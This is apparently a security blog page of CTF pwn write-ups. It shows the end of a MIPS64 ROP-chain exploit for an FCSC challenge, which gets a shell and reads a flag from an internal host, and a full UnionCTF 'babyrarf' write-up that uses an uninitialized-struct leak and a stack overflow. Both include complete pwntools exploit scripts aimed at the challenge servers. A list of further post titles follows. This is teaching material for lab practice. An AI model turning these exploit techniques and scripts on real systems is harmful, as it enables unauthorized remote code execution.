.text:0000000120004130                 daddiu  $v1, $fp, 0x1010  ; Doubleword Add Immediate Unsigned
.text:0000000120004134                 move    $a2, $zero       ; envp
.text:0000000120004138                 move    $a1, $v1         ; argv
.text:000000012000413C                 move    $a0, $v0         ; path
.text:0000000120004140                 dla     $v0, execve      ; Load 64-bit address
.text:0000000120004144                 move    $t9, $v0         ; execve
.text:0000000120004148                 jalr    $t9 ; execve     ; Jump And Link Register
.text:000000012000414C                 nop
; skip

It's a part of the ip function, called when we trigger the "Show network interfaces" option. When I saw at the begin of the function, some local variables like a pointer to the "/bin/sh" string and a block of code which executes especially execve("/bin/sh", "-c", NULL). Since I discovered this basic block I thought I should have to jump around it with the right stackframe. But after a few hours I figured out it wasn't possible :(. And figured out too that the NULL byte isn't a badchar :).

ROPchain

Now we're able to craft a ropchain with only one badchar: "\n". To do so we can launch ROPgadget to find some suitable gadgets:

$ ROPgadget --binary mipsy > gadgets

On mips architechture there is no ret or pop instructions, to handle this issue we use gadgets which load directly a 64 bit value stored in the stack into a register like this:

ld $a0, 0x8($sp) ; It will read the doubleword in $sp+8 to load it in the $a0 register.

And to return we need to find a load on a register like $t9 which is often used to resolve and call extern functions or on $ra which is the standard register used to store the address of the calling function.

And that's why it's too hard to find automatically gadgets for mips binaries. But fortunately, ROPgadgets finds a a great amount of gadgets which helps us a lot.

The exploitation would be for me to jmp to the execve's call with the right context. The code looks like such:

.text:0000000120004134                 move    $a2, $zero       ; envp
.text:0000000120004138                 move    $a1, $v1         ; argv
.text:000000012000413C                 move    $a0, $v0         ; path
.text:0000000120004140                 dla     $v0, execve      ; Load 64-bit address
.text:0000000120004144                 move    $t9, $v0         ; execve
.text:0000000120004148                 jalr    $t9 ; execve     ; Jump And Link Register
.text:000000012000414C                 nop

To do so we have to:

set $v1 register to NULL
set $v0 register to a pointer to /bin/sh
set $gp, the global pointer to the right value to be able do execute the dla instruction.

An important thing to notice is that on mips architechture, when an instruction is executed the next instruction is too executed despite of the result of the current instruction. So when we will choose our gadgets, we need to be careful according to the instruction after the control flow instruction.

And the good value for $gp is a constant from which the dla instruction addresses memory areas. And if we check the value of $gp in gdb, we got: 0x120048020.

To control the $v1 register we can grep on the gadgets found by ROPgadget:

$ grep "ld \$v0, " gadgets | grep \$sp

Then we got a lot of candidate which are not efficient. And if we're very careful we find an interesting gadget:

0x000000012001b4d8 : ld $v0, 0x210($sp) ; ld $t9, 0x228($sp) ; jalr $t9 ; move $a0, $s6

It's perfect because it allows us to control the value of $v0 and the value of the next gadget that we can store in $t9 to jump on !

We can apply process to find a gadget for $v1:

$ grep "ld \$v1, " gadgets | grep \$sp
[skip]
0x000000012001270c : ld $v1, 0x80($sp) ; sd $v0, 0xf0($sp) ; dsubu $s5, $v0, $v1 ; dsll $v0, $s5, 6 ; ld $a0, 0xb8($sp) ; ld $t9, 0xe0($sp) ; move $a1, $v0 ; sd $v1, 0xf8($sp) ; jalr $t9 ; sd $v0, 0x100($sp)
[skip]

It's a gadget a bit more hard to understand but we just have to take care to: do not write $v0, control the value of $v9 to jump on, control the value of $v1. And so this gadget is a good candidate.

Finally we need to control the value of the $gp register but to achieve that we do not need to use a gadget, because we already control it thanks to the vuln epilogue:

.text:00000001200046A4 loc_1200046A4:                           # CODE XREF: authenticate+104↑j
.text:00000001200046A4                 move    $sp, $fp         # _
.text:00000001200046A8                 ld      $ra, 0x90+ret_addr($sp)  # Load Doubleword
.text:00000001200046AC                 ld      $fp, 0x90+var_10($sp)  # Load Doubleword
.text:00000001200046B0                 ld      $gp, 0x90+var_18($sp)  # Load Doubleword
.text:00000001200046B4                 daddiu  $sp, 0x90        # Doubleword Add Immediate Unsigned
.text:00000001200046B8                 jr      $ra              # Jump Register
.text:00000001200046BC                 nop

Put all together

For the pruposes of mips exploitation I developped a small function in python which inserts automatically a value at an arbitrary offset.

def make_pld(s, val, pos):
    if len(s) == pos:
        print(f"[*] Gadget: s += {val}")
        s += val
        return s
    elif len(s) > pos:
        print(f"[*] Gadget: {s[:pos-1]} + {val} + {s[pos-1+len(val):]}")
        s = s[:pos-1] + val + s[pos-1+len(val):]
        return s 
    elif len(s) < pos:
        k = "\x00"*(pos-len(s))
        print(f"[*] Gadget: {s} + {k} + {val}")
        return s + b"\x00"*(pos-len(s)) + val

It's very useful because we are then able to give the right offset about the stack pointer when we execute the gadgets. We can begin by overwriting the value of the saved $gp and $ra:

GP = 0x120048020
BASE_RSP = 0x90

pld  = make_pld(b"", p64(GP), BASE_RSP-0x18) # $gp
pld  = make_pld(pld, p64(SET_V1), BASE_RSP-0x8) # $ra

BASE_RSP is the offset of the input's buffer about the $sp address when we return and so when we start to execute some gadgets. We indicate the gadget to execute which is the gadget which sets $v1 register to zero.

Then we can put the right value in $v1 by looking at the SET_V1 gadget which loads the doubleword in 0x80($sp) in $v1. So we have to add to our payload:

pld  = make_pld(pld, p64(0x0), BASE_RSP+(0x80)) # $v1

And we have to set the right value for the next gadget to execute. The gadget loads the doubleword in 0xe0($sp) in $t9 and then jmp on, so we can add our SET_V0 gadget to be then executed:

pld  = make_pld(pld, p64(SET_V0), BASE_RSP+(0xe0)) # $t9

We repeat the same operation for the SET_V0 gadget by setting a pointer to '/bin/sh' in 0x210($sp) and the address of the final execve call in 0x228($sp):

pld  = make_pld(pld, p64(BINSH), BASE_RSP+(0x210)) # $v0
pld  = make_pld(pld, p64(EXECVE), BASE_RSP+(0x228)) # $t9

We finished the ROPchain, now we just have to send it to the server and to enjoy the shell !

The final script looks like such:

#!/usr/bin/python3
from pwn import ELF, context, remote, p64 

BINSH = 0x120025A20

e = ELF('mipsy')

context.bits = 64 # mips64
context.arch = "mips"
context.endian = "big" # Not a mipsel binary

def make_pld(s, val, pos):
    if len(s) == pos:
        s += val
        return s
    elif len(s) > pos:
        s = s[:pos-1] + val + s[pos-1+len(val):]
        return s 
    elif len(s) < pos:
        k = "\x00"*(pos-len(s))
        return s + b"\x00"*(pos-len(s)) + val 

SET_V0 = 0x12001B4D8 # : ld $v0, 0x210($sp) ; ld $t9, 0x228($sp) ; jalr $t9 ; move $a0, $s6

SET_V1 = 0x000000012001270c # : ld $v1, 0x80($sp) ; sd $v0, 0xf0($sp) ; dsubu $s5, $v0, $v1 ; dsll $v0, $s5, 6 ; ld $a0, 0xb8($sp) ; ld $t9, 0xe0($sp) ; move $a1, $v0 ; sd $v1, 0xf8($sp) ; jalr $t9 ; sd $v0, 0x100($sp)

EXECVE = 0x120004134

GP = 0x120048020
BASE_RSP = 0x90

def start():
    return remote("challenges2.france-cybersecurity-challenge.fr", 4005)
    # return remote("localhost", 4000)

io = start()
io.sendlineafter("] ", b"3")

pld  = make_pld(b"", p64(GP), BASE_RSP-0x18) # $gp
pld  = make_pld(pld, p64(SET_V1), BASE_RSP-0x8) # $ra
pld  = make_pld(pld, p64(0x0), BASE_RSP+(0x80)) # $v1
pld  = make_pld(pld, p64(SET_V0), BASE_RSP+(0xe0)) # $t9
pld  = make_pld(pld, p64(BINSH), BASE_RSP+(0x210)) # $v0
pld  = make_pld(pld, p64(EXECVE), BASE_RSP+(0x228)) # $t9

io.sendlineafter(">>> ", pld)
io.interactive()

Final part

According to the statements we need to read some files stored on the filer machine. So firstly let's run the exploit to get the shell:

$ ./solve.py                                                                  
[!] Could not emulate PLT instructions for ELF('mipsy/mipsy')
[!] Could not populate PLT: not enough values to unpack (expected 2, got 0)
[*] 'mipsy/mipsy'
    Arch:     mips64-64-big
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x120000000)
    RWX:      Has RWX segments
[+] Opening connection to challenges2.france-cybersecurity-challenge.fr on port 4005: Done
[*] Switching to interactive mode
Error: wrong password.
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
list_interfaces.sh
mipsy
$

We see no flag, so according to the statements maybe we have to curl the filer machine which seems to be a HTTP server:

$ curl filer
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Directory listing for /</title>
</head>
<body>
<h1>Directory listing for /</h1>
<hr>
<ul>
<li><a href="flag">flag</a></li>
</ul>
<hr>
</body>
</html>

It's a directory listing of the files stored in filer, and so we just have to curl filer/flag to get the flag:

$ curl filer/flag
FCSC{82ed60ce9c8b1136b1da7df24c9996b6232671e66f62bad1bd0e3fc163761519}

And we got the flag ! This challenge was very cool because it's a "real world" scenario and it makes me discovering mips assembly !

[UnionCTF 2021 - pwn] babyrarf

Sun, 21 Feb 2021 00:00:00 GMT

The binary can be found right here.

[UnionCTF] Babyrarf

Welcome guys,

This Write-Up is about de first pwn challenge of unionctf: babyrarf. It was a really easy challenge with a stack based buffer overflow. The source code was provided so, no need to reverse the binary :).

Let's take a look at the src!

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>

typedef struct attack {
    uint64_t id;
    uint64_t dmg;
} attack;

typedef struct character {
    char name[10];
    int health;
} character;

uint8_t score;

int read_int(){
    char buf[10];
    fgets(buf, 10, stdin);
    return atoi(buf);
}

void get_shell(){
    execve("/bin/sh", NULL, NULL);
}

attack choose_attack(){
    attack a;
    int id;
    puts("Choose an attack:\n");
    puts("1. Knife\n");
    puts("2. A bigger knife\n");
    puts("3. Her Majesty's knife\n");
    puts("4. A cr0wn\n");
    id = read_int();
    if (id == 1){
        a.id = 1;
        a.dmg = 10;
    }
    else if (id == 2){
        a.id = 2;
        a.dmg = 20;
    }
    else if (id == 3){
        a.id = 3;
        a.dmg = 30;
    }
    else if (id == 4){
        if (score == 0){
            puts("l0zers don't get cr0wns\n");
        }
        else{
            a.id = 4;
            a.dmg = 40;
        }
    }
    else{
        puts("Please select a valid attack next time\n");
        a.id = 0;
        a.dmg = 0;
    }
    return a;
}

int main(){
    character player = { .health = 100};
    character boss = { .health = 100, .name = "boss"};
    attack a;
    int dmg;

    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    srand(0);

    puts("You are fighting the rarf boss!\n");
    puts("What is your name?\n");
    fgets(player.name, 10, stdin);

    score = 10;

    while (score < 100){
        a = choose_attack();
        printf("You choose attack %llu\n", a.id);
        printf("You deal %llu dmg\n", a.dmg);
        boss.health -= a.dmg;
        dmg = rand() % 100;
        printf("The boss deals %llu dmg\n", dmg);
        player.health -= dmg;
        if (player.health > boss.health){
            puts("You won!\n");
            score += 1;
        }
        else{
            puts("You lost!\n");
            score -= 1;
        }
        player.health = 100;
        boss.health = 100;
    }

    puts("Congratulations! You may now declare yourself the winner:\n");
    fgets(player.name, 48, stdin);
    return 0;
}

It's basically some kind of game, we have to win a lot of times to display Congratulations! You may now declare yourself the winner. And when we reach this part we can trigger a buffer overflow with a call to fgets (fgets(player.name, 48, stdin);). We notice too the get_shell function (maybe we will have to jump on ?).

Let's take a look at gdb:

──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffdf48│+0x0000: 0x00007ffff7dd30b3  →  <__libc_start_main+243> mov edi, eax	 ← $rsp
0x00007fffffffdf50│+0x0008: 0x00007ffff7ffc620  →  0x0005081200000000
0x00007fffffffdf58│+0x0010: 0x00007fffffffe038  →  0x00007fffffffe357  →  "/home/nasm/dist/babyrarf"
0x00007fffffffdf60│+0x0018: 0x0000000100000000
0x00007fffffffdf68│+0x0020: 0x00005555555552e4  →  <main+0> push rbp
0x00007fffffffdf70│+0x0028: 0x00005555555554d0  →  <__libc_csu_init+0> endbr64 
0x00007fffffffdf78│+0x0030: 0xdb21ca7fd193f05a
0x00007fffffffdf80│+0x0038: 0x00005555555550b0  →  <_start+0> endbr64 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x5555555552de <choose_attack+234> mov    rdx, QWORD PTR [rbp-0x18]
   0x5555555552e2 <choose_attack+238> leave  
   0x5555555552e3 <choose_attack+239> ret    
 → 0x5555555552e4 <main+0>         push   rbp
   0x5555555552e5 <main+1>         mov    rbp, rsp
   0x5555555552e8 <main+4>         sub    rsp, 0x40
   0x5555555552ec <main+8>         mov    QWORD PTR [rbp-0x20], 0x0
   0x5555555552f4 <main+16>        mov    QWORD PTR [rbp-0x18], 0x0
   0x5555555552fc <main+24>        mov    DWORD PTR [rbp-0x14], 0x64
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "babyrarf", stopped 0x5555555552e4 in main (), reason: BREAKPOINT
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x5555555552e4 → main()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

And at the call to fgets:

   0x55555555537d <main+153>       lea    rax, [rbp-0x20]
   0x555555555381 <main+157>       mov    esi, 0xa
   0x555555555386 <main+162>       mov    rdi, rax
 → 0x555555555389 <main+165>       call   0x555555555060 <fgets@plt>
   ↳  0x555555555060 <fgets@plt+0>    jmp    QWORD PTR [rip+0x2fca]        # 0x555555558030 <fgets@got.plt>
      0x555555555066 <fgets@plt+6>    push   0x3
      0x55555555506b <fgets@plt+11>   jmp    0x555555555020
      0x555555555070 <execve@plt+0>   jmp    QWORD PTR [rip+0x2fc2]        # 0x555555558038 <execve@got.plt>
      0x555555555076 <execve@plt+6>   push   0x4
      0x55555555507b <execve@plt+11>  jmp    0x555555555020
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
fgets@plt (
   $rdi = 0x00007fffffffdf20 → 0x0000000000000000,
   $rsi = 0x000000000000000a,
   $rdx = 0x00007ffff7f97980 → 0x00000000fbad208b
)
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "babyrarf", stopped 0x555555555389 in main (), reason: SINGLE STEP
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555555389 → main()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

So main_ret_addr minus player.name is equal to: 0x00007fffffffdf48 - 0x00007fffffffdf20 = 40 . So we have basically a padding of 40 bytes before the return address, and according to the last fgets, we can only enter 48 bytes. We can so overwrite only the return address.

Now we can take a look at the permissions:

gef➤  checksec
[+] checksec for '/home/nasm/dist/babyrarf'
Canary                        : ✘ 
NX                            : ✓ 
PIE                           : ✓ 
Fortify                       : ✘ 
RelRO                         : Partial

We can see, the binary is PIE based, so in order to jump on get_shell we need to leak some binary's functions. To do so we can mind the code of choose_attack function:

attack choose_attack(){
    attack a;
    int id;
    /* Some print stuff */
    id = read_int(); // It is readinf the type of weapons we want
    
    /* Here it is handling properly dammage and weapon type */

    else if (id == 4){
        if (score == 0){
            puts("l0zers don't get cr0wns\n");
        }
        else{
            a.id = 4;
            a.dmg = 40;
        }
    }
    else{
        puts("Please select a valid attack next time\n");
        a.id = 0;
        a.dmg = 0;
    }
    return a;
}

The interesting part is that when our score is zero and that we choose the fourth weapon, the id et dmg fields are not initialized. And so it's returning a non initialized struct that it will print just next in the main function:


    /* ... */
    a = choose_attack();
    printf("You choose attack %llu\n", a.id);
    printf("You deal %llu dmg\n", a.dmg);
    /*...*/

Uninitialized structures are very useful to obtain leaks because their content is depending of the ancient stackframes which have stored local variables and especially useful pointers. And when we try to leak these datas, we can see that a.id displays the address of __lib_csu_init. So we just need to leak the address of __lib_csu_init to compute the base address of the binary and so the address of get_shell.


from pwn import *

#p = process("babyrarf")

r = remote('35.204.144.114', 1337)
e = ELF('babyrarf')

set_ = False
base = 0
csu_leak = 0

def padd(d):
    return d + '\00'*(8-len(d))

print(r.recvuntil("What is your name?\n\n"))
r.sendline("nasm")
print(r.recvuntil("4. A cr0wn\n\n"))
r.sendline("1")

while True:
    a = r.recvuntil("4. A cr0wn\n\n", timeout=1)

    if not a:
        break
    print(a)
    
    if not set_:
        r.sendline("4")
    else:
        r.sendline("1")

    b = r.recvuntil("You choose attack ")

    if "l0zers don't get cr0wns" in b:
        leak_csu = int(padd(r.recvline().replace("\n", "")))
        print("leak_csu={}".format(hex(int(leak_csu))))
        base = leak_csu - e.symbols['__libc_csu_init']

        print("base: {}".format(hex(base)))

        set_ = True

print(r.recvuntil("Congratulations! You may now declare yourself the winner:\n\n"))

#gdb.attach(p.pid)
r.sendline("A"*40 + p64(e.symbols['get_shell'] + base))
r.interactive()

We can compute compute the value of rand to avoid bruteforce, but I've choosen to do not. So while it does not print l0zers don't get cr0wns, I'm sending 4 for cr0wn and when it is teh case I get my leak of the csu and I compute the base address. When It's done I'm sending 1 because it sounds more speed and I wait to win. And when I won I can trigger the buffer overflow and jmp on get_shell.

/* ... */
/* lot of iterations */
/* ... */

You deal 40 dmg
The boss deals 70 dmg
You lost!

Choose an attack:

1. Knife

2. A bigger knife

3. Her Majesty's knife

4. A cr0wn


leak_csu=0x55b3b5b3a4d0
base: 0x55b3b5b39000
You deal 140736258161760 dmg
The boss deals 96 dmg
You lost!

Congratulations! You may now declare yourself the winner:


[*] Switching to interactive mode
$ cat /home/babyrarf/flag.txt
union{baby_rarf_d0o_d00_do0_doo_do0_d0o}

The final script can be found here.

That's all folks :)

nasm.re

[Netbsd - cryptodev] One integer overflow and plenty of UAF

Introduction

UAF, Double-Free, and NULL Dereference

Race Condition in cryptof_ioctl / cryptodev_op: Use-After-Free & Double-Free

Affected Component

CIOCCRYPT/CIOCFSESSION Session Lifetime Race

Concurrent cryptodev_op on the Same Session: uio Race

Root Cause

Proof of Concept

Fix

NULL Pointer Dereference in cryptodev_op

Root Cause

Trigger Conditions

Impact

Environment

Exploitability

[Cryptodev-linux] Page-level UAF exploitation

Introduction

Basic design

The bug

Exploitation

Page migration

struct file spraying

Misc

VirtualBox fuzzing - improvements

Introduction

Issues due to the design of VirtualBox devices

Patching qemu and KVM-PT

Adding the fuzzer's callback to the device struct

Functions interacting with the guest memory

VirtualBox fuzzing - Basic harness

Introduction

xHCI

Transfer Ring and TRB

Vulnerability research perspective

Preliminary work

Setup

Building the L0, L1 and L2 kernel

Building the L2 iso

Booting on the L1

Building VirtualBox

Configuring and starting the L2 virtual machine

The L2 harness

Fuzzing

Building the corpus

Ip ranges

Nested fuzzing

Basic Harness

Feeding the fuzzer with the MMIO area

Results

L1 fuzzing

Issues

Results

Conclusion

[ImaginaryCTF 2023 - pwn] window-of-opportunity

window-of-opportunity

Code review

Exploitation

Defeat kASLR

initramfs for the win

PROFIT

Annexes

[ImaginaryCTF 2023 - pwn] mailman

mailman

TL;DR

Code review

Exploitation

Heap and libc leak

House of botcake for the win

FSOP on stdout

PROFIT

Annexes

[Grey Cat CTF Quals 2023 - pwn] Write me a Book

Write me a book

TL;DR

General overview

Code review

Exploitation

Leaking libc

Race Condition in `cryptof_ioctl` / `cryptodev_op`: Use-After-Free & Double-Free

Concurrent `cryptodev_op` on the Same Session: `uio` Race